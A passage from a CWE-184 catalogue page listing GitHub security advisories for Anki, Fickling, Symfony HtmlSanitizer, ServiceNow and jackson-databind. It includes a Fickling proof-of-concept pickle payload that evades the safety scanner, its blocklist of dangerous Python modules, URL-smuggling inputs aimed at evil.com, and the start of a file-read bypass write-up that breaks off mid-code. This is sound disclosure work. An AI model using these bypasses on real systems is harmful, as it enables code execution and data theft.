CWE-184
AllowedIncomplete List of Disallowed Inputs
Abstraction: Base · Status: Draft
The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.
306 vulnerabilities reference this CWE, most recent first.
GHSA-Q47P-V5RW-V574
Vulnerability from github – Published: 2024-07-22 15:32 – Updated: 2024-07-26 16:13A blocklist bypass vulnerability exists in the LaTeX functionality of Ankitects Anki 24.04. A specially crafted malicious flashcard can lead to an arbitrary file creation at a fixed path. An attacker can share a malicious flashcard to trigger this vulnerability.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "anki"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "24.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-32152"
],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-25T14:44:26Z",
"nvd_published_at": "2024-07-22T15:15:03Z",
"severity": "LOW"
},
"details": "A blocklist bypass vulnerability exists in the LaTeX functionality of Ankitects Anki 24.04. A specially crafted malicious flashcard can lead to an arbitrary file creation at a fixed path. An attacker can share a malicious flashcard to trigger this vulnerability.",
"id": "GHSA-q47p-v5rw-v574",
"modified": "2024-07-26T16:13:25Z",
"published": "2024-07-22T15:32:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32152"
},
{
"type": "WEB",
"url": "https://github.com/ankitects/anki/pull/3218"
},
{
"type": "WEB",
"url": "https://github.com/ankitects/anki/commit/06f7aa393d21d7d5dd8039e15d543b73c3346932"
},
{
"type": "PACKAGE",
"url": "https://github.com/ankitects/anki"
},
{
"type": "WEB",
"url": "https://skerritt.blog/anki-0day"
},
{
"type": "WEB",
"url": "https://skii.dev/anki-0day"
},
{
"type": "WEB",
"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-1994"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Ankitects Anki LaTeX Blocklist Bypass vulnerability"
}
GHSA-Q5QQ-MVFM-J35X
Vulnerability from github – Published: 2026-01-09 21:12 – Updated: 2026-01-11 14:55Fickling's assessment
ctypes, importlib, runpy, code and multiprocessing were added the list of unsafe imports (https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66, https://github.com/trailofbits/fickling/commit/eb299b453342f1931c787bcb3bc33f3a03a173f9, https://github.com/trailofbits/fickling/commit/29d5545e74b07766892c1f0461b801afccee4f91, https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1, https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1).
Original report
Summary
The unsafe_imports() method in Fickling's static analyzer fails to flag several high-risk Python modules that can be used for arbitrary code execution. Malicious pickles importing these modules will not be detected as unsafe, allowing attackers to bypass Fickling's primary static safety checks.
Details
In fickling/fickle.py lines 866-884, the unsafe_imports() method checks imported modules against a hardcoded tuple:
def unsafe_imports(self) -> Iterator[ast.Import | ast.ImportFrom]:
for node in self.properties.imports:
if node.module in (
"__builtin__", "__builtins__", "builtins", "os", "posix", "nt",
"subprocess", "sys", "builtins", "socket", "pty", "marshal", "types",
):
yield node
This list is incomplete. The following dangerous modules are NOT detected:
- ctypes: Allows arbitrary memory access, calling C functions, and bypassing Python restrictions entirely
- importlib: Can dynamically import any module at runtime
- runpy: Can execute Python modules as scripts
- code: Can compile and execute arbitrary Python code
- multiprocessing: Can spawn processes with arbitrary code
Since ctypes is part of the Python standard library, it also bypasses the NonStandardImports analysis.
PoC
from fickling.fickle import Pickled
from fickling.analysis import check_safety, Severity
# Pickle that imports ctypes.pythonapi (allows arbitrary code execution)
# PROTO 4, GLOBAL 'ctypes pythonapi', STOP
payload = b'\x80\x04cctypes\npythonapi\n.'
pickled = Pickled.load(payload)
results = check_safety(pickled)
print(f"Severity: {results.severity.name}")
print(f"Is safe: {results.severity == Severity.LIKELY_SAFE}")
# Output: Severity is LIKELY_SAFE or low - the ctypes import is not flagged
# A truly malicious pickle using ctypes could execute arbitrary code
Impact
Security Bypass (Confidentiality, Integrity, Availability)
An attacker can craft a malicious pickle that:
1. Imports ctypes to gain arbitrary memory access
2. Uses ctypes.pythonapi or ctypes.CDLL to execute arbitrary code
3. Passes Fickling's safety analysis as "likely safe"
4. Executes malicious code when the victim loads the pickle after trusting Fickling's verdict
This undermines the core purpose of Fickling as a pickle safety scanner.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.1.6"
},
"package": {
"ecosystem": "PyPI",
"name": "fickling"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-22609"
],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-09T21:12:00Z",
"nvd_published_at": "2026-01-10T02:15:50Z",
"severity": "HIGH"
},
"details": "#Fickling\u0027s assessment\n\n`ctypes`, `importlib`, `runpy`, `code` and `multiprocessing` were added the list of unsafe imports (https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66, https://github.com/trailofbits/fickling/commit/eb299b453342f1931c787bcb3bc33f3a03a173f9, https://github.com/trailofbits/fickling/commit/29d5545e74b07766892c1f0461b801afccee4f91, https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1, https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1). \n\n# Original report\n\n## Summary\n\nThe `unsafe_imports()` method in Fickling\u0027s static analyzer fails to flag several high-risk Python modules that can be used for arbitrary code execution. Malicious pickles importing these modules will not be detected as unsafe, allowing attackers to bypass Fickling\u0027s primary static safety checks.\n\n## Details\n\nIn `fickling/fickle.py` lines 866-884, the `unsafe_imports()` method checks imported modules against a hardcoded tuple:\n\n```python\ndef unsafe_imports(self) -\u003e Iterator[ast.Import | ast.ImportFrom]:\n for node in self.properties.imports:\n if node.module in (\n \"__builtin__\", \"__builtins__\", \"builtins\", \"os\", \"posix\", \"nt\",\n \"subprocess\", \"sys\", \"builtins\", \"socket\", \"pty\", \"marshal\", \"types\",\n ):\n yield node\n```\n\nThis list is incomplete. The following dangerous modules are NOT detected:\n\n- **ctypes**: Allows arbitrary memory access, calling C functions, and bypassing Python restrictions entirely\n- **importlib**: Can dynamically import any module at runtime\n- **runpy**: Can execute Python modules as scripts\n- **code**: Can compile and execute arbitrary Python code\n- **multiprocessing**: Can spawn processes with arbitrary code\n\nSince `ctypes` is part of the Python standard library, it also bypasses the `NonStandardImports` analysis.\n\n## PoC\n\n```python\nfrom fickling.fickle import Pickled\nfrom fickling.analysis import check_safety, Severity\n\n# Pickle that imports ctypes.pythonapi (allows arbitrary code execution)\n# PROTO 4, GLOBAL \u0027ctypes pythonapi\u0027, STOP\npayload = b\u0027\\x80\\x04cctypes\\npythonapi\\n.\u0027\n\npickled = Pickled.load(payload)\nresults = check_safety(pickled)\n\nprint(f\"Severity: {results.severity.name}\")\nprint(f\"Is safe: {results.severity == Severity.LIKELY_SAFE}\")\n\n# Output: Severity is LIKELY_SAFE or low - the ctypes import is not flagged\n# A truly malicious pickle using ctypes could execute arbitrary code\n```\n\n## Impact\n\n**Security Bypass (Confidentiality, Integrity, Availability)**\n\nAn attacker can craft a malicious pickle that:\n1. Imports `ctypes` to gain arbitrary memory access\n2. Uses `ctypes.pythonapi` or `ctypes.CDLL` to execute arbitrary code\n3. Passes Fickling\u0027s safety analysis as \"likely safe\"\n4. Executes malicious code when the victim loads the pickle after trusting Fickling\u0027s verdict\n\nThis undermines the core purpose of Fickling as a pickle safety scanner.",
"id": "GHSA-q5qq-mvfm-j35x",
"modified": "2026-01-11T14:55:13Z",
"published": "2026-01-09T21:12:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-q5qq-mvfm-j35x"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22609"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/pull/195"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/29d5545e74b07766892c1f0461b801afccee4f91"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/6b400e1a2525e6a4a076c97ccc0d4d9581317101"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/b793563e60a5e039c5837b09d7f4f6b92e6040d1"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/commit/eb299b453342f1931c787bcb3bc33f3a03a173f9"
},
{
"type": "PACKAGE",
"url": "https://github.com/trailofbits/fickling"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/blob/977b0769c13537cd96549c12bb537f05464cf09c/test/test_bypasses.py#L88"
},
{
"type": "WEB",
"url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Fickling has Static Analysis Bypass via Incomplete Dangerous Module Blocklist"
}
GHSA-QC95-4862-92FH
Vulnerability from github – Published: 2026-05-27 20:13 – Updated: 2026-05-27 20:13Description
symfony/html-sanitizer lets applications sanitise untrusted HTML. The configuration methods allowLinkHosts([...]) and allowLinkSchemes([...]) are intended to restrict <a href> targets to an allowlist of hosts/schemes; allowMediaHosts() / allowMediaSchemes() do the same for <img src> etc.
Three distinct bypasses allow a content author to smuggle off-allowlist URLs past these checks. First, UrlSanitizer::parse() parses the input following RFC-3986, while browsers follow the WHATWG URL Standard which normalises \ to / before parsing the authority of "special" schemes; so an input like https://evil\@trusted.com/ parses with host trusted.com server-side but navigates to https://evil/ in the browser. Second, WHATWG collapses any run of / after the scheme into //, while RFC-3986 does not; so https:/evil.com/ and https:///evil.com/ parse as host-less (skipping the host allowlist) but resolve to evil.com in the browser. Third, UrlAttributeSanitizer checks 'a' === $element to route to the link policy and falls through to the media policy otherwise, but <area> is a navigable hyperlink equivalent to <a>; so <area href> was sanitised against the media policy (which typically allows data: and may have no host allowlist), bypassing allowLinkHosts() / allowLinkSchemes() entirely.
Resolution
UrlSanitizer::sanitize() now rejects URLs that contain a backslash or that use a special scheme (http, https, ftp, ws, wss) followed by a single slash or three slashes before parsing, eliminating the parser-differential bypasses. UrlAttributeSanitizer now applies the link policy to both <a> and <area> elements.
The patch for this issue is available here for branch 5.4.
Credits
Symfony would like to thank Claude Mythos Preview (via Project Glasswing) for reporting the issue and providing the fix.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/html-sanitizer"
},
"ranges": [
{
"events": [
{
"introduced": "6.1.0"
},
{
"fixed": "6.4.40"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/html-sanitizer"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "7.4.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/html-sanitizer"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.0.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "6.1.0"
},
{
"fixed": "6.4.40"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "7.4.12"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "symfony/symfony"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.0"
},
{
"fixed": "8.0.12"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45066"
],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-436"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-27T20:13:04Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Description\n\n`symfony/html-sanitizer` lets applications sanitise untrusted HTML. The configuration methods `allowLinkHosts([...])` and `allowLinkSchemes([...])` are intended to restrict `\u003ca href\u003e` targets to an allowlist of hosts/schemes; `allowMediaHosts()` / `allowMediaSchemes()` do the same for `\u003cimg src\u003e` etc.\n\nThree distinct bypasses allow a content author to smuggle off-allowlist URLs past these checks. First, `UrlSanitizer::parse()` parses the input following RFC-3986, while browsers follow the WHATWG URL Standard which normalises `\\` to `/` before parsing the authority of \"special\" schemes; so an input like `https://evil\\@trusted.com/` parses with host `trusted.com` server-side but navigates to `https://evil/` in the browser. Second, WHATWG collapses any run of `/` after the scheme into `//`, while RFC-3986 does not; so `https:/evil.com/` and `https:///evil.com/` parse as host-less (skipping the host allowlist) but resolve to `evil.com` in the browser. Third, `UrlAttributeSanitizer` checks `\u0027a\u0027 === $element` to route to the link policy and falls through to the media policy otherwise, but `\u003carea\u003e` is a navigable hyperlink equivalent to `\u003ca\u003e`; so `\u003carea href\u003e` was sanitised against the media policy (which typically allows `data:` and may have no host allowlist), bypassing `allowLinkHosts()` / `allowLinkSchemes()` entirely.\n\n### Resolution\n\n`UrlSanitizer::sanitize()` now rejects URLs that contain a backslash or that use a special scheme (`http`, `https`, `ftp`, `ws`, `wss`) followed by a single slash or three slashes before parsing, eliminating the parser-differential bypasses. `UrlAttributeSanitizer` now applies the link policy to both `\u003ca\u003e` and `\u003carea\u003e` elements.\n\nThe patch for this issue is available [here](https://github.com/symfony/symfony/commit/d506b556d3d3906f3e8660ad82257ce87edbaac4) for branch 5.4.\n\n### Credits\n\nSymfony would like to thank Claude Mythos Preview (via Project Glasswing) for reporting the issue and providing the fix.",
"id": "GHSA-qc95-4862-92fh",
"modified": "2026-05-27T20:13:04Z",
"published": "2026-05-27T20:13:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/symfony/symfony/security/advisories/GHSA-qc95-4862-92fh"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/html-sanitizer/CVE-2026-45066.yaml"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2026-45066.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/symfony/symfony"
},
{
"type": "WEB",
"url": "https://symfony.com/cve-2026-45066"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Symfony has an HtmlSanitizer allowLinkHosts() / allowMediaHosts() Bypass via URL-Parser Differentials and \u003carea\u003e Misclassification"
}
GHSA-QM6X-V3JW-CVP7
Vulnerability from github – Published: 2024-07-10 18:32 – Updated: 2024-07-12 00:30ServiceNow has addressed a sensitive file read vulnerability that was identified in the Washington DC, Vancouver, and Utah Now Platform releases. This vulnerability could allow an administrative user to gain unauthorized access to sensitive files on the web application server. The vulnerability is addressed in the listed patches and hot fixes, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.
{
"affected": [],
"aliases": [
"CVE-2024-5178"
],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-10T17:15:12Z",
"severity": "MODERATE"
},
"details": "ServiceNow has addressed a sensitive file read vulnerability that was identified in the Washington DC, Vancouver, and Utah Now Platform releases. This vulnerability could allow an administrative user to gain unauthorized access to sensitive files on the web application server.\u00a0The vulnerability is addressed in the listed patches and hot fixes, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.",
"id": "GHSA-qm6x-v3jw-cvp7",
"modified": "2024-07-12T00:30:35Z",
"published": "2024-07-10T18:32:17Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5178"
},
{
"type": "WEB",
"url": "https://support.servicenow.com/kb?id=kb_article_view\u0026sysparm_article=KB1644293"
},
{
"type": "WEB",
"url": "https://support.servicenow.com/kb?id=kb_article_view\u0026sysparm_article=KB1648312"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-QXXX-2PP7-5HMX
Vulnerability from github – Published: 2018-10-16 17:21 – Updated: 2024-03-01 21:41A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.6.7.0"
},
"package": {
"ecosystem": "Maven",
"name": "com.fasterxml.jackson.core:jackson-databind"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.6.7.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.7.9.0"
},
"package": {
"ecosystem": "Maven",
"name": "com.fasterxml.jackson.core:jackson-databind"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.9.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.fasterxml.jackson.core:jackson-databind"
},
"ranges": [
{
"events": [
{
"introduced": "2.8.0"
},
{
"fixed": "2.8.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2017-7525"
],
"database_specific": {
"cwe_ids": [
"CWE-184",
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2020-06-16T21:53:14Z",
"nvd_published_at": "2018-02-06T15:29:00Z",
"severity": "CRITICAL"
},
"details": "A deserialization flaw was discovered in the jackson-databind, versions before 2.6.7.1, 2.7.9.1 and 2.8.9, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper.",
"id": "GHSA-qxxx-2pp7-5hmx",
"modified": "2024-03-01T21:41:47Z",
"published": "2018-10-16T17:21:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7525"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/issues/1723"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/issues/1599"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/fd8dec2c7fab8b4b4bd60502a0f1d63ec23c24da"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/fa87c1ddbe803ebb7295f5c2ebfe38e12f6e6162"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/3bfbb835e530055c1941ddf87fde0b08d08dcd38"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/680d75b011edd67a2d2a2e9980998a968194c2ef"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/6ce32ffd18facac6abdbbf559c817b47fcb622c1"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-databind/commit/90042692085deeb05ae75c569c9909f7dba24415"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-qxxx-2pp7-5hmx"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/3c87dc8bca99a2b3b4743713b33d1de05b1d6b761fdf316224e9c81f@%3Cdev.lucene.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/4641ed8616ccc2c1fbddac2c3dc9900c96387bc226eaf0232d61909b@%3Ccommits.cassandra.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/5008bcbd45ee65ce39e4220b6ac53d28a24d6bc67d5804e9773a7399@%3Csolr-user.lucene.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/b1f33fe5ade396bb903fdcabe9f243f7692c7dfce5418d3743c2d346@%3Cdev.lucene.apache.org%3E"
},
{
"type": "WEB",
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2017/dsa-4004"
},
{
"type": "WEB",
"url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03902en_us"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20171214-0002"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00039.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rf7f87810c38dc9abf9f93989f76008f504cbf7c1a355214640b2d04c@%3Ccommits.cassandra.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589@%3Cissues.spark.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/r42ac3e39e6265db12d9fc6ae1cd4b5fea7aed9830dc6f6d58228fed7@%3Ccommits.cassandra.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/f60afd3c7e9ebaaf70fad4a4beb75cf8740ac959017a31e7006c7486@%3Cdev.lucene.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/c9d5ff20929e8a3c8794facf4c4b326a9c10618812eec356caa20b87@%3Csolr-user.lucene.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/c2ed4c0126b43e324cf740012a0edd371fd36096fd777be7bfe7a2a6@%3Cdev.lucene.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/c10a2bf0fdc3d25faf17bd191d6ec46b29a353fa9c97bebd7c4e5913@%3Cdev.lucene.apache.org%3E"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:1834"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:1835"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:1836"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:1837"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:1839"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:1840"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2477"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2546"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2547"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2633"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2635"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2636"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2637"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:2638"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:3141"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:3454"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:3455"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:3456"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2017:3458"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:0294"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:0342"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:1449"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2018:1450"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2019:0910"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2019:2858"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2019:3149"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1462702"
},
{
"type": "WEB",
"url": "https://cwiki.apache.org/confluence/display/WW/S2-055"
},
{
"type": "PACKAGE",
"url": "https://github.com/FasterXML/jackson-databind"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
},
{
"type": "WEB",
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "jackson-databind is vulnerable to a deserialization flaw"
}
GHSA-R48F-3986-4F9C
Vulnerability from github – Published: 2026-03-13 20:57 – Updated: 2026-03-13 20:57Our analysis
As stated in the project's security policy, we also don't consider UnusedVariables bypasses to be security issues. We added several unsafe modules mentioned by the reporter in advisory comments to the blocklist (https://github.com/trailofbits/fickling/commit/7f39d97258217ee2c21a1f5031d4a6d7343eb30d).
Original report
Title: UnusedVariables analysis bypass via BUILD opcode Arbitrary File Read through fickling.load()
Summary
Two independent bugs in fickling's AST-based static analysis combine to allow a malicious pickle file to execute arbitrary stdlib function calls - including reading sensitive files - while check_safety() returns Severity.LIKELY_SAFE and fickling.load() completes without raising UnsafeFileError.
A server using fickling.load() as a security gate before deserializing untrusted pickle data (its documented use case) is fully bypassed. The attacker receives the contents of any file readable by the server process as the return value of fickling.load().
Details
Interpreter.unused_assignments() does not scan the result assignment's RHS
File: fickling/fickle.py, Interpreter.unused_assignments(), ~line 1242
for statement in self.module_body:
if isinstance(statement, ast.Assign):
if (
len(statement.targets) == 1
and isinstance(statement.targets[0], ast.Name)
and statement.targets[0].id == "result"
):
break
...
statement = statement.value
if statement is not None:
for node in ast.walk(statement):
if isinstance(node, ast.Name):
used.add(node.id)
When the loop reaches result = _varN, it breaks immediately. The right-hand side of the result assignment is never walked for variable references. Any variable whose only reference is inside the result expression is therefore never added to the used set and is incorrectly flagged as unused - unless it also appears in an earlier non-assignment statement.
The BUILD opcode generates exactly such a non-assignment statement:
# Build.run() generates:
_var4 = _var3 # Assign - _var3 added to used
_var4.__setstate__(_var2) # Expr - _var2 and _var4 added to used
This makes _var2 (the result of the dangerous call) appear in the used set via the setstate expression, so UnusedVariables never flags it.
File: fickling/fickle.py, TupleThree.run(), and siblings
def run(self, interpreter: Interpreter):
top = interpreter.stack.pop()
mid = interpreter.stack.pop()
bot = interpreter.stack.pop()
interpreter.stack.append(ast.Tuple((bot, mid, top), ast.Load()))
# ^^^^^^^^^^^^^^^^
# Python tuple, not list
Python's ast module requires repeated fields (such as Tuple.elts) to be lists. When elts is a Python tuple, ast.iter_child_nodes() does not yield its elements, so ast.walk() never descends into them. Any variable reference stored inside such a tuple node is invisible to every analysis that uses ast.walk() - including UnusedVariables.
Demo:
import ast
name = ast.Name(id='_var1', ctx=ast.Load())
# Correct (list elts) - ast.walk finds it
t = ast.Tuple(elts=[name], ctx=ast.Load())
print([n.id for n in ast.walk(t) if isinstance(n, ast.Name)]) # ['_var1']
# Buggy (tuple elts) - ast.walk finds nothing
t = ast.Tuple(elts=(name,), ctx=ast.Load())
print([n.id for n in ast.walk(t) if isinstance(n, ast.Name)]) # []
Combined attack - arbitrary file read
The two bugs combine with the absence of linecache and difflib from UNSAFE_IMPORTS:
from linecache import getlines # not in UNSAFE_IMPORTS
